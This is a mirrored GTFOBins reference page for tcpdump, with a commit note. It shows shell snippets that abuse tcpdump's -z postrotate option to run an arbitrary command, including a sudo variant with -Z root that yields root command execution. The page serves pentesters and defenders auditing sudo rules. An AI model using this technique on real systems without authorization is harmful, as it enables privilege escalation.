GTFOBins.github.io/tcpdump.md at 2b5811bea6a14f7029e18e8da97d97bfae329a82

mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-06-18 17:49:29 +02:00

Syed Umar Arfeen c37da57373 Providing user as argument using -Z

For certain distributions running tcpdump without providing -Z (user) argument
causes the provided command to be executed as the `tcpdump` user which has low
privileges by default.

2019-09-23 04:04:05 +02:00

704 B

Raw Blame History

description

functions

These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background. In recent distributions (e.g., Debian 10 and Ubuntu 18) AppArmor limits the `postrotate-command` to a small subset of predefined commands thus preventing the execution of the following.

command

sudo

code
COMMAND='id' TF=$(mktemp) echo "$COMMAND" > $TF chmod +x $TF tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

code
COMMAND='id' TF=$(mktemp) echo "$COMMAND" > $TF chmod +x $TF sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root

704 B Raw Blame History

704 B

Raw Blame History